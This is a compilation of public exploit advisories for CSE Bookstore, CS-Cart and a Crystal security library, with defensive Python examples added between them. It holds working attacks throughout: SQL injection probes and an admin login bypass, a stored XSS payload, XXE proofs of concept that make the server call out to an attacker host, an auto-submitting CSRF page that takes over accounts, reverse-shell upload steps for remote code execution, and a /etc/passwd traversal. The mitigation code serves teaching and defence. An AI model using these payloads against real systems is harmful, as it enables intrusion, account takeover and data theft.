Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9


bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart

RESPONSE
=======
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1

POC 3.
Lastly, the bookisbn parameter of book.php is vulnerable to SQL injection. This is also high severity, since it could lead to dumping the database credentials.

REQUEST
=======
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on

RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:47:58 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html; charset=UTF-8

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
            
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909


CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. 
By default the admin panel is located at /admin.php; the administrator interface can be reached by unauthorized users by exploiting a SQL injection in the login handler (admin_verify.php).

Payload: 
Name: admin
Pass: %' or '1'='1 

Sample BurpSuite intercept:

POST /bookstore/admin_verify.php HTTP/1.1
Host: 192.168.20.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://192.168.20.131
Connection: close
Referer: http://192.168.20.131/bookstore/admin.php
Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
Upgrade-Insecure-Requests: 1

name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query
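The three advisories above (the bookPerPub.php / cart.php / book.php injections, the CSP MySQL User Manager login bypass and this admin.php bypass) are the same defect: quote characters in user input are pasted into the SQL text. The following is an added example, not code from either product: the vulnerable string-building pattern beside the parameterised query, exercised with the exact payloads from the advisories against a constructed SQLite schema (SQLite stands in for MySQL/MariaDB because the flaw is in how the query is assembled, not in the engine).

```python
import sqlite3

# Added example, not code from CSE Bookstore or CSP MySQL User Manager.
# The tables and rows below are constructed for the demonstration.
SCHEMA = """
CREATE TABLE admin (name TEXT, pass TEXT);
INSERT INTO admin VALUES ('admin', 'correct-horse-battery-staple');
CREATE TABLE books (pubid INTEGER, title TEXT);
INSERT INTO books VALUES (4, 'Example Book');
INSERT INTO books VALUES (7, 'Another Book');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_concat(conn, name, password):
    """Vulnerable: the admin_verify.php / CSP MUM pattern, input spliced into SQL."""
    sql = "SELECT COUNT(*) FROM admin WHERE name='%s' AND pass='%s'" % (name, password)
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn, name, password):
    """Fixed: bound parameters, so quotes in the input remain data."""
    sql = "SELECT COUNT(*) FROM admin WHERE name=? AND pass=?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


def books_by_pub_concat(conn, pubid):
    """Vulnerable bookPerPub.php-style lookup.  Returns (titles, error_text);
    the error text is what the "Can't retrieve data ..." page above echoes."""
    sql = "SELECT title FROM books WHERE pubid='%s' ORDER BY title" % pubid
    try:
        return [row[0] for row in conn.execute(sql)], None
    except sqlite3.OperationalError as exc:
        return [], str(exc)


def books_by_pub_param(conn, pubid):
    """Fixed lookup: a stray quote is just a value that matches nothing."""
    sql = "SELECT title FROM books WHERE pubid=? ORDER BY title"
    return [row[0] for row in conn.execute(sql, (pubid,))], None


if __name__ == "__main__":
    db = connect()
    print("CSE bypass, concat :", login_concat(db, "admin", "%' or '1'='1"))
    print("CSE bypass, param  :", login_param(db, "admin", "%' or '1'='1"))
    print("CSP bypass, concat :", login_concat(db, "admin' or ' 1=1--", "anything"))
    print("error probe, concat:", books_by_pub_concat(db, "4'"))
    print("error probe, param :", books_by_pub_param(db, "4'"))
```

The error-based probe (pubid=4') shows why the advisories could fingerprint the bug from the HTTP response: the database error string is passed straight back to the client, which is a second fix to make alongside parameterisation.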
            
# Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting
# Date: 30/10/2020
# Exploit Author: Vyshnav NK
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 and Windows 7

CSE Bookstore is vulnerable to persistent cross-site scripting on checkout.php and cart.php: a user can submit an XSS payload as the quantity, and once added it fires as a stored payload every time the MyCart option is clicked.

The below URL can be accessed by a User

URL :  http://localhost/php/checkout.php and http://localhost/php/cart.php

Payload : "><svg/onload=alert(5)>

Insert XSS Payload into Quantity Section
            
# Software : CS-Cart <= 4.3.10
# Vendor home : cs-cart.com
# Author : Ahmed Sultan (@0x4148)
# Home : 0x4148.com
# Email : 0x4148@gmail.com
# Tested on : apache on windows with php 5.4.4 / apache on linux with php <5.2.17

From vendor site
CS-Cart is an impressive platform for users to any level of eCommerce
experience.
With loads of features at a great price, CS-Cart is a great shopping cart
solution that will quickly enable your online store to do business.

XXE I : Twigmo addon
app/addons/twigmo/Twigmo/Api/ApiData.php
Line 131
    public static function parseDocument($data, $format = TWG_DEFAULT_DATA_FORMAT)
    {
        if ($format == 'xml') {
            $result = @simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOCDATA);
            return self::getObjectAsArray($result);
        } elseif ($format == 'jsonp') {
            return (array) json_decode($data, true);
        } elseif ($format == 'json') {
            return (array) json_decode($data, true);
        }

        return false;
    }
POC
<?php
$xml="
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM 'http://YOUR_HOST/0x4148.jnk' >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>&xxe;</killit>
</document>
";
echo rawurlencode(base64_encode($xml));
?>

Change YOUR_HOST to your server address and use the output in the following
POST request:
Action -> HOST/cs-cart/index.php?dispatch=twigmo.post
Data -> action=add_to_cart&data=DATA_OUT_PUT_HERE&format=xml
A GET request will be sent to your web server from the vulnerable host,
indicating a successful attack.
(Requires the Twigmo addon to be activated)

XXE II : Amazon payment
File : app/payments/amazon/amazon_callback.php
Line 16
use Tygh\Registry;

if (!defined('BOOTSTRAP')) { die('Access denied'); }

include_once (Registry::get('config.dir.payments') . 'amazon/amazon_func.php');

fn_define('AMAZON_ORDER_DATA', 'Z');

if (!empty($_POST['order-calculations-request'])) {
    $xml_response = $_POST['order-calculations-request'];

} elseif (!empty($_POST['NotificationData'])) {
    $xml_response = $_POST['NotificationData'];
}

if (!empty($_POST['order-calculations-error'])) {
    // Process the Amazon callback error
    $xml_error = $_POST['order-calculations-error'];
    $xml = @simplexml_load_string($xml_error);
    if (empty($xml)) {
        $xml = @simplexml_load_string(stripslashes($xml_error));
    }

    // Get error message
    $code = (string) $xml->OrderCalculationsErrorCode;
    $message = (string) $xml->OrderCalculationsErrorMessage;

POC
Send a POST request to
app/payments/amazon/amazon_checkout.php
with the POST parameter order-calculations-request set to
<?xml version='1.0'?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://host/amazon.jnk" >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>%26xxe%3b</killit>
</document>

This results in a GET request to your host from the vulnerable machine,
indicating a successful attack.
(Requires the Amazon payment method to be activated)


Disclosure time line
10/11 vulnerabilities reported to the vendor
11/11 Vendor asked for extra details
12/11 Vendor acknowledged the validity of vulnerabilities and asked for
time to fix
16/11 vendor permitted public release

Reference
https://0x4148.com/2016/11/10/cs-cart/
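Both XXE entry points above hand unauthenticated POST data to simplexml_load_string, and the out-of-band GET to the attacker's host is the external entity being resolved. The following is an added example, not CS-Cart code: it models the two inputs (the Twigmo "data" field as URL-encoded base64, matching the PoC encoder, and the Amazon callback field as a URL-encoded form value), decodes them, and refuses any document that carries a DOCTYPE or ENTITY declaration before a parser sees it. The handler names, the decoding steps and the sample documents are assumptions for illustration.

```python
import base64
import binascii
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Added example, not CS-Cart code.  Decoding steps and handler names are
# assumptions modelled on the PoCs above, not taken from the product.

# Reject any DTD before parsing: an unauthenticated caller has no business
# declaring entities, and that is where SYSTEM (external) entities live.
_DTD_MARKERS = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Sample documents, constructed here; the XXE one mirrors the PoC payload.
BENIGN_XML = ("<?xml version='1.0'?><document><Author>demo</Author>"
              "<killit>ok</killit></document>")
XXE_XML = ("<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM 'http://YOUR_HOST/0x4148.jnk' >]>"
           "<document><Author>demo</Author><killit>&xxe;</killit></document>")


def encode_twigmo_data(xml_text):
    """Same transformation as the PoC's PHP: rawurlencode(base64_encode($xml))."""
    return urllib.parse.quote(base64.b64encode(xml_text.encode()).decode(), safe="")


def encode_amazon_field(xml_text):
    """A form-encoded POST field, as a browser or curl would send it."""
    return urllib.parse.quote(xml_text, safe="")


def parse_untrusted_xml(xml_text):
    """Parse XML from an unauthenticated caller.  Returns {tag: text} for the
    root's children; raises ValueError if the document carries a DTD."""
    if _DTD_MARKERS.search(xml_text):
        raise ValueError("DTD / entity declarations are not accepted")
    root = ET.fromstring(xml_text)
    return {child.tag: (child.text or "") for child in root}


def handle_twigmo_post(form):
    """dispatch=twigmo.post with format=xml.  Returns ("ok", data) or ("rejected", why)."""
    try:
        raw = base64.b64decode(urllib.parse.unquote(form["data"]), validate=True)
        return "ok", parse_untrusted_xml(raw.decode())
    except (KeyError, ValueError, binascii.Error, UnicodeDecodeError, ET.ParseError) as exc:
        return "rejected", str(exc)


def handle_amazon_callback(form):
    """amazon_callback.php-style handler for order-calculations-request."""
    try:
        xml_text = urllib.parse.unquote(form["order-calculations-request"])
        return "ok", parse_untrusted_xml(xml_text)
    except (KeyError, ValueError, ET.ParseError) as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    print(handle_twigmo_post({"data": encode_twigmo_data(BENIGN_XML)}))
    print(handle_twigmo_post({"data": encode_twigmo_data(XXE_XML)}))
    print(handle_amazon_callback({"order-calculations-request": encode_amazon_field(XXE_XML)}))
```

In PHP the same guard belongs in front of simplexml_load_string: reject a DOCTYPE in the raw string, never pass LIBXML_NOENT, and on libxml2 older than 2.9 call libxml_disable_entity_loader(true) first, since those versions load external entities by default.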
            
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]

Standard CSRF that allows you to change a user's password. Fairly lame, but I noticed no one had reported this bug yet.

Exploit pasted below and attached.

<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
    Exploit By: Connection
    Blacksun Hacker's Club
    irc.blacksunhackers.com #lobby
-->
    <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
      <input type="hidden" name="user_data[password1]" value="CSRFpass" />
      <input type="hidden" name="user_data[password2]" value="CSRFpass" />
      <input type="hidden" name="user_data[profile_name]" value="Concept" />
      <input type="hidden" name="dispatch[profiles.update]" value="" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>


Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground
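The exploit page above works because profiles.update accepts the browser's session cookie as the only proof that the user meant to submit the form. The following is an added example, not CS-Cart code: a guard that binds a random token to the session (something the attacker's page at another origin cannot read) and checks the Origin/Referer header, run against the exact hidden fields of the exploit. The request and session shapes, the csrf_token field name and the site origin are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Added example, not CS-Cart code.  A request is modelled as a dict with
# "headers" and "form" (field names follow the exploit's form); the session is
# a dict; "csrf_token" and SITE_ORIGIN are assumed names.

SERVER_SECRET = secrets.token_bytes(32)      # per-deployment key, generated here
SITE_ORIGIN = "http://shop.example"          # assumed origin of the store


def issue_csrf_token(session):
    """Token bound to this session.  The real form embeds it as a hidden input;
    a page on another origin can neither read it nor forge the HMAC."""
    if "csrf_seed" not in session:
        session["csrf_seed"] = secrets.token_hex(16)
    return hmac.new(SERVER_SECRET, session["csrf_seed"].encode(), hashlib.sha256).hexdigest()


def _same_origin(headers):
    # Browsers attach Origin to cross-site POSTs; Referer is the fallback.  A
    # request carrying neither is refused; relax that only for non-browser clients.
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def profiles_update(session, request):
    """Guarded profiles.update.  Returns ("ok", new_email) or ("rejected", why)."""
    headers, form = request["headers"], request["form"]
    if not _same_origin(headers):
        return "rejected", "cross-origin request"
    expected = issue_csrf_token(session).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(expected, supplied):
        return "rejected", "missing or wrong CSRF token"
    if form.get("user_data[password1]") != form.get("user_data[password2]"):
        return "rejected", "password mismatch"
    session["email"] = form["user_data[email]"]
    return "ok", session["email"]


def exploit_form():
    """The hidden fields of the exploit page above, auto-submitted from the
    attacker's origin by the victim's browser (cookie attached, no token)."""
    return {
        "headers": {"Origin": "http://attacker.example"},
        "form": {
            "user_data[email]": "hacked@lol.dongs",
            "user_data[password1]": "CSRFpass",
            "user_data[password2]": "CSRFpass",
            "user_data[profile_name]": "Concept",
            "dispatch[profiles.update]": "",
        },
    }


if __name__ == "__main__":
    session = {"email": "owner@shop.example"}
    print(profiles_update(session, exploit_form()))
```

The origin check and the token are independent layers: the first stops the exploit as written, the second still holds when a client strips or spoofs Referer, which is why both checks are kept even though either would reject this particular form.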
            
source: https://www.securityfocus.com/bid/49378/info

CS-Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CS-Cart 2.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/controllers/customer/products.php?tabs_group_id=[SQL INJECT] 
            
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE



Steps:
1. Get a PHP reverse shell from http://pentestmonkey.net/tools/web-shells/php-reverse-shell
2. Edit the IP and PORT in the shell.
3. Upload it via the file manager.
4. Change the extension from .php to .phtml.
5. Visit http://[victim]/skins/shell.phtml --> Profit.
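The rename to .phtml in step 4 is the whole trick: the upload filter blocks ".php" while the web server's PHP handler still claims .phtml. The following is an added example, not CS-Cart code, showing that deny-list check next to an allow-list that validates every suffix of the name and lets the server choose the stored file name. The set of handler extensions is an assumption about a typical Apache/mod_php configuration; the server's own AddHandler/FilesMatch rules are what actually decide what executes.

```python
import os
import secrets

# Added example, not CS-Cart code.  PHP_HANDLER_EXTS is an assumption about a
# typical Apache/mod_php setup; read the real config before relying on it.
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif", "webp"}
PHP_HANDLER_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phps", "phar"}


def denylist_accepts(filename):
    """The check the advisory defeats: only the literal ".php" suffix is blocked,
    so shell.phtml (still handled by PHP) goes through."""
    return not filename.lower().endswith(".php")


def allowlist_accepts(filename):
    """Accept only names whose every suffix is a known-safe extension, so
    shell.phtml, shell.php.png and .htaccess all fail."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(p in IMAGE_EXTS for p in parts[1:])


def would_execute(filename):
    """Approximation: does the last suffix belong to the PHP handler?  Apache's
    AddHandler also matches inner extensions, so allow-listing every suffix
    (above) is the safer rule."""
    return filename.rsplit(".", 1)[-1].lower() in PHP_HANDLER_EXTS


def stored_name(filename):
    """Server-chosen name: a random stem plus the validated extension, so the
    uploader controls neither the path nor the base name."""
    if not allowlist_accepts(filename):
        raise ValueError("extension not allowed: %s" % filename)
    return secrets.token_hex(8) + "." + filename.rsplit(".", 1)[-1].lower()


if __name__ == "__main__":
    for name in ("shell.php", "shell.phtml", "shell.php.png", "1626800829_logo.png"):
        print("%-22s deny-list=%-5s allow-list=%-5s executes=%s" % (
            name, denylist_accepts(name), allowlist_accepts(name), would_execute(name)))
```

Storing uploads outside the document root, or under a directory where the handler is disabled, is the complementary control: even a file that slips past the name check then cannot be requested as a script.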
            
# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI


http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example: 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
            
# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass
# Exploit Author : Halis Duraki (@0xduraki)
# Date : 2020-05-28
# Product : http-protection (Crystal Shard)
# Product URI : https://github.com/rogeriozambon/http-protection
# Version : http-protection <= 0.2.0
# CVE : N/A

## About the product

This library/shard (http-protection) protects against typical web attacks within Crystal applications. It was inspired by the rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and its usage is not known (no information available), but the shard gets traction on Crystal's official channels (Crystal's ANN, Gitter, and Shardbox).

## About the exploit

The `IpSpoofing` middleware detects spoofing attacks (and, likewise, should prevent them). Both of these functions can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting a mismatch between the IP address values of `X-Forwarded-For` and `X-Real-IP`/`X-Client-IP`. If the values mismatch, the middleware protects the application by forcing a `403 (Forbidden)` response.

Relevant code (src/http-protection/ip_spoofing.cr):

```
module HTTP::Protection
class IpSpoofing
...

def call(... ctx)
...
ips = headers["X-Forwarded-For"].split(/\s*,\s*/)

return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"])
return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"])
...
end
end
end
```

The exploit works by hardcoding the same constant IP address in every request header the protection inspects. The standard format for `X-Forwarded-For` per the MDN reference is: `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measure, such as access controls.

@see CWE-16: https://cwe.mitre.org/data/definitions/16.html

## PoC (Proof of Concept)

* Set a breakpoint on the request, or intercept request.
* Hardcode all three request headers to the same address:
* X-Forwarded-For: 123.123.123.123
* X-Client-IP: 123.123.123.123
* X-Real-IP: 123.123.123.123
* Continue the request.
* The response should be 200 OK; a detected mismatch would give 403 Forbidden.

++ Request example (POC):

```
GET / HTTP/1.1
Host: localhost.:8081
X-Forwarded-For: 123.123.123.123
X-Client-IP: 123.123.123.123
X-Real-IP: 123.123.123.123
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
```

++ Response (POC):

```
200 OK
```

## Fix

It is advised to fix the IpSpoofing detection by checking the socket data (the connection's remote address) directly instead of relying on passed header key/values. The other solution is to have the proxy discard such client-supplied headers on the way in and use the original source address it proxied for.
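To make the fix concrete, the following is an added example, not http-protection's code: a Python port of the quoted IpSpoofing check, the bypass request from the PoC run through it, and the socket-anchored alternative the paragraph above describes, which starts from the peer address the client cannot forge and only walks X-Forwarded-For back through proxies the deployment owns. TRUSTED_PROXIES and the append-on-forward behaviour of those proxies are assumptions about the deployment.

```python
import ipaddress

# Added example, not http-protection's code.  TRUSTED_PROXIES is an assumption
# about the deployment; nothing here is taken from the shard.

# The three headers from the PoC request, all set to the same constant.
SPOOF_HEADERS = {
    "X-Forwarded-For": "123.123.123.123",
    "X-Client-IP": "123.123.123.123",
    "X-Real-IP": "123.123.123.123",
}


def ip_spoofing_check(headers):
    """Port of the Crystal middleware: 403 when X-Client-IP or X-Real-IP is not
    one of the X-Forwarded-For entries, 200 otherwise.  Every input is
    attacker-chosen, which is why a consistent lie passes."""
    xff = headers.get("X-Forwarded-For", "")
    ips = [p.strip() for p in xff.split(",")] if xff else []
    for key in ("X-Client-IP", "X-Real-IP"):
        if key in headers and headers[key] not in ips:
            return 403
    return 200


# Assumed: the application sits behind reverse proxies in this range, and each
# proxy appends the address it accepted the connection from to X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted_proxy(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr, headers):
    """The fix direction: anchor on the socket peer address and only walk
    X-Forwarded-For back through our own proxies."""
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer):
        # Direct connection: every X-* header is attacker-controlled, ignore them.
        return str(peer)
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    # Right to left: the rightmost entry was appended by the proxy we trust, each
    # earlier one by the proxy before it.  Stop at the first untrusted hop.
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # garbage in the chain: fall back to the peer
        if not _is_trusted_proxy(addr):
            return str(addr)
    return str(peer)


if __name__ == "__main__":
    print("middleware verdict on PoC headers:", ip_spoofing_check(SPOOF_HEADERS))
    print("direct client, PoC headers      :", client_ip("203.0.113.5", SPOOF_HEADERS))
    print("via trusted proxy 10.0.0.7      :",
          client_ip("10.0.0.7", {"X-Forwarded-For": "123.123.123.123, 198.51.100.9"}))
```

The second function never consults X-Client-IP or X-Real-IP at all: once the peer is not a trusted proxy, the headers carry no information, and once it is, the proxy's own appended entry is the only one that was not written by the client.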

==============================================================================================================
+ Halis Duraki | duraki@linuxmail.org | @0xduraki | https://duraki.github.io
==============================================================================================================